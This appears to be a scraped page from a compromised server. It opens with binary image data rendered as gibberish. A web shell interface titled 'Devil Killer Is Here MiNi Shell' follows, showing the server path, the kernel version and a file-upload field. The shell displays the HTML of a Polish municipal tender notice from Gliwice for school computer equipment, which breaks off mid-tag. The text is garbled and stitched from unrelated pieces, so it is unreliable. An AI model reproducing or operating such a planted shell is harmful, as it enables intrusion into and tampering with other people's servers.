JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250317/0014977001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup sprzętu komputerowego i multimedialnego w ramach projektu: &#34;Dostosowanie kwalifikacji i umiejętności uczniów Zespołu Szkół Budowlano-Ceramicznych w Gliwicach na potrzeby rynku pracy&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Gliwice</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276255335</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zwycięstwa 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">za@um.gliwice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://gliwice.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup sprzętu komputerowego i multimedialnego w ramach projektu: &#34;Dostosowanie kwalifikacji i umiejętności uczniów Zespołu Szkół Budowlano-Ceramicznych w Gliwicach na potrzeby rynku pracy&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d9fe80a4-5b68-4fca-9218-59441c859fd2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00149770</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> &#34;Dostosowanie kwalifikacji i umiejętności uczniów Zespołu Szkół Budowlano-Ceramicznych w Gliwicach na potrzeby rynku pracy&#34;, nr FESL.10.23-IZ.01-073G/23, finansowanym ze środków Funduszu Sprawiedliwej Transformacji oraz budżetu państwa w ramach programu Fundusze Europejskie dla Śląskiego 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d9fe80a4-5b68-4fca-9218-59441c859fd2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) w postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami (z zastrzeżeniem sposobu przygotowania i złożenia oferty) odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl lub poczty elektronicznej,<br/>2) Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: za@um.gliwice.pl (nie dotyczy składania ofert).<br/>Szczegółowe informacje o środkach komunikacji elektronicznej zostały określone w Rozdziale 11. SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Szczegółowe informacje o środkach komunikacji elektronicznej zostały określone w Rozdziale 11. SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem 26. SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZA.271.13.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> A. INFORMACJE PODSTAWOWE:<br/>Przedmiotem zamówienia jest wyposażenie w sprzęt komputerowy i multimedialny 5 pracowni nauki zawodu oraz gabinetu terapeutycznego w Zespole Szkół Budowlano - Ceramicznych w Gliwicach organizowane w ramach projektu o tytule &#34;Dostosowanie kwalifikacji i umiejętności uczniów Zespołu Szkół Budowlano-Ceramicznych w Gliwicach na potrzeby rynku pracy&#34;, nr FESL.10.23-IZ.01-073G/23, finansowanym ze środków Funduszu Sprawiedliwej Transformacji oraz budżetu państwa w ramach programu Fundusze Europejskie dla Śląskiego 2021-2027, Priorytet: X Fundusze Europejskie na transformację, Działanie 10.23 Edukacja zawodowa w procesie sprawiedliwej transformacji regionu.<br/><br/>B. INFORMACJE SZCZEGÓŁOWE:<br/>Część nr 1 dotyczy dostawy: laptopów (68 szt.) oraz laptopa dla pedagoga (2 szt.).<br/><br/>C. Wymagania dotyczące realizacji przedmiotu zamówienia:<br/>1. Zamawiający nie dopuszcza sprzętu prefabrykowanego.<br/>2. Dostarczany sprzęt musi być:<br/>a) kompletny, tj.: mieć okablowanie przystosowane do polskich gniazd sieciowych, zasilacze oraz wszystkie inne komponenty, zapewniające właściwą instalację i użytkowanie.<br/>b) fabrycznie nowy, nie noszący znamion użytkowania, wolny od wad, musi posiadać cechy i parametry minimalne określone przez Zamawiającego w załączniku nr 7 do SWZ - szczegółowy opis przedmiotu zamówienia,<br/>c) musi być zapakowany w oryginalne opakowania producenta, opatrzone w etykiety identyfikujące każdy z produktów,<br/>d) powinien posiadać certyfikat zgodności CE dla części 1,2 i 4 (zgodnie z załącznikiem nr 7 do SWZ - szczegółowy opis przedmiotu zamówienia),<br/>e) powinien posiadać instrukcję obsługi w języku polskim, specyfikację techniczną, kartę gwarancyjną producenta (powyższe dokumenty [wskazane w lit. d) i lit. e)] Wykonawca dostarcza wraz z dostawą sprzętu).<br/><br/>D. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 7 do SWZ.<br/><br/>Wymagany termin gwarancji: min 24 miesiące, max 36 miesięcy,<br/>Wymagany termin rękojmi: okres rękojmi będzie równy okresowi gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213100-6 - Komputery przenośne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> A. INFORMACJE PODSTAWOWE:<br/>Przedmiotem zamówienia jest wyposażenie w sprzęt komputerowy i multimedialny 5 pracowni nauki zawodu oraz gabinetu terapeutycznego w Zespole Szkół Budowlano - Ceramicznych w Gliwicach organizowane w ramach projektu o tytule &#34;Dostosowanie kwalifikacji i umiejętności uczniów Zespołu Szkół Budowlano-Ceramicznych w Gliwicach na potrzeby rynku pracy&#34;, nr FESL.10.23-IZ.01-073G/23, finansowanym ze środków Funduszu Sprawiedliwej Transformacji oraz budżetu państwa w ramach programu Fundusze Europejskie dla Śląskiego 2021-2027, Priorytet: X Fundusze Europejskie na transformację, Działanie 10.23 Edukacja zawodowa w procesie sprawiedliwej transformacji regionu.<br/><br/>B. INFORMACJE SZCZEGÓŁOWE:<br/>Część nr 2 dotyczy dostawy: zestawów komputerowych stacjonarnych składających się z jednostki centralnej, monitora, myszki i klawiatury (16 zestawów).<br/><br/>C. Wymagania dotyczące realizacji przedmiotu zamówienia:<br/>1. Zamawiający nie dopuszcza sprzętu prefabrykowanego.<br/>2. Dostarczany sprzęt musi być:<br/>a) kompletny, tj.: mieć okablowanie przystosowane do polskich gniazd sieciowych, zasilacze oraz wszystkie inne komponenty, zapewniające właściwą instalację i użytkowanie.<br/>b) fabrycznie nowy, nie noszący znamion użytkowania, wolny od wad, musi posiadać cechy i parametry minimalne określone przez Zamawiającego w załączniku nr 7 do SWZ - szczegółowy opis przedmiotu zamówienia,<br/>c) musi być zapakowany w oryginalne opakowania producenta, opatrzone w etykiety identyfikujące każdy z produktów,<br/>d) powinien posiadać certyfikat zgodności CE dla części 1,2 i 4 (zgodnie z załącznikiem nr 7 do SWZ - szczegółowy opis przedmiotu zamówienia),<br/>e) powinien posiadać instrukcję obsługi w języku polskim, specyfikację techniczną, kartę gwarancyjną producenta (powyższe dokumenty [wskazane w lit. d) i lit. e)] Wykonawca dostarcza wraz z dostawą sprzętu).<br/> <br/>D. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 7 do SWZ.<br/><br/>Wymagany termin gwarancji: min 24 miesiące, max 36 miesięcy,<br/>Wymagany termin rękojmi: okres rękojmi będzie równy okresowi gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213000-5 - Komputery osobiste</p> <p class="mb-0">30237410-6 - Myszka komputerowa</p> <p class="mb-0">30237460-1 - Klawiatury komputerowe</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> A. INFORMACJE PODSTAWOWE:<br/>Przedmiotem zamówienia jest wyposażenie w sprzęt komputerowy i multimedialny 5 pracowni nauki zawodu oraz gabinetu terapeutycznego w Zespole Szkół Budowlano - Ceramicznych w Gliwicach organizowane w ramach projektu o tytule &#34;Dostosowanie kwalifikacji i umiejętności uczniów Zespołu Szkół Budowlano-Ceramicznych w Gliwicach na potrzeby rynku pracy&#34;, nr FESL.10.23-IZ.01-073G/23, finansowanym ze środków Funduszu Sprawiedliwej Transformacji oraz budżetu państwa w ramach programu Fundusze Europejskie dla Śląskiego 2021-2027, Priorytet: X Fundusze Europejskie na transformację, Działanie 10.23 Edukacja zawodowa w procesie sprawiedliwej transformacji regionu.<br/><br/>B. INFORMACJE SZCZEGÓŁOWE:<br/>Część nr 3 dotyczy dostawy: urządzenia wielofunkcyjnego A4 monochromatycznego (drukarka, ksero, skaner) (1 szt.) oraz drukarki kolorowej atramentowej (5 szt.).<br/><br/>C. Wymagania dotyczące realizacji przedmiotu zamówienia:<br/><br/>1. Zamawiający nie dopuszcza sprzętu prefabrykowanego.<br/>2. Dostarczany sprzęt musi być:<br/>a) kompletny, tj.: mieć okablowanie przystosowane do polskich gniazd sieciowych, zasilacze oraz wszystkie inne komponenty, zapewniające właściwą instalację i użytkowanie.<br/>b) fabrycznie nowy, nie noszący znamion użytkowania, wolny od wad, musi posiadać cechy i parametry minimalne określone przez Zamawiającego w załączniku nr 7 do SWZ - szczegółowy opis przedmiotu zamówienia,<br/>c) musi być zapakowany w oryginalne opakowania producenta, opatrzone w etykiety identyfikujące każdy z produktów,<br/>d) powinien posiadać instrukcję obsługi w języku polskim, specyfikację techniczną, kartę gwarancyjną producenta. Dokumenty Wykonawca dostarcza wraz z dostawą sprzętu.<br/> <br/>D. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 7 do SWZ.<br/><br/>Wymagany termin gwarancji: min 24 miesiące, max 36 miesięcy,<br/>Wymagany termin rękojmi: okres rękojmi będzie równy okresowi gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30232130-4 - Kolorowe drukarki atramentowe</p> <p class="mb-0">30232110-8 - Drukarki laserowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> A. INFORMACJE PODSTAWOWE:<br/>Przedmiotem zamówienia jest wyposażenie w sprzęt komputerowy i multimedialny 5 pracowni nauki zawodu oraz gabinetu terapeutycznego w Zespole Szkół Budowlano - Ceramicznych w Gliwicach organizowane w ramach projektu o tytule &#34;Dostosowanie kwalifikacji i umiejętności uczniów Zespołu Szkół Budowlano-Ceramicznych w Gliwicach na potrzeby rynku pracy&#34;, nr FESL.10.23-IZ.01-073G/23, finansowanym ze środków Funduszu Sprawiedliwej Transformacji oraz budżetu państwa w ramach programu Fundusze Europejskie dla Śląskiego 2021-2027, Priorytet: X Fundusze Europejskie na transformację, Działanie 10.23 Edukacja zawodowa w procesie sprawiedliwej transformacji regionu.<br/><br/>B. INFORMACJE SZCZEGÓŁOWE:<br/>Część nr 4 dotyczy dostawy: monitora interaktywnego (5 szt.).<br/><br/>C. Wymagania dotyczące realizacji przedmiotu zamówienia:<br/>1. Zamawiający nie dopuszcza sprzętu prefabrykowanego.<br/>2. Dostarczany sprzęt musi być:<br/>a) kompletny, tj.: mieć okablowanie przystosowane do polskich gniazd sieciowych, zasilacze oraz wszystkie inne komponenty, zapewniające właściwą instalację i użytkowanie.<br/>b) fabrycznie nowy, nie noszący znamion użytkowania, wolny od wad, musi posiadać cechy i parametry minimalne określone przez Zamawiającego w załączniku nr 7 do SWZ - szczegółowy opis przedmiotu zamówienia,<br/>c) musi być zapakowany w oryginalne opakowania producenta, opatrzone w etykiety identyfikujące każdy z produktów,<br/>d) powinien posiadać certyfikat zgodności CE dla części 1,2 i 4 (zgodnie z załącznikiem nr 7 do SWZ - szczegółowy opis przedmiotu zamówienia),<br/>e) powinien posiadać instrukcję obsługi w języku polskim, specyfikację techniczną, kartę gwarancyjną producenta (powyższe dokumenty [wskazane w lit. d) i lit. e)] Wykonawca dostarcza wraz z dostawą sprzętu).<br/> <br/>D. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 7 do SWZ.<br/><br/>Wymagany termin gwarancji: min 24 miesiące, max 36 miesięcy,<br/>Wymagany termin rękojmi: okres rękojmi będzie równy okresowi gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 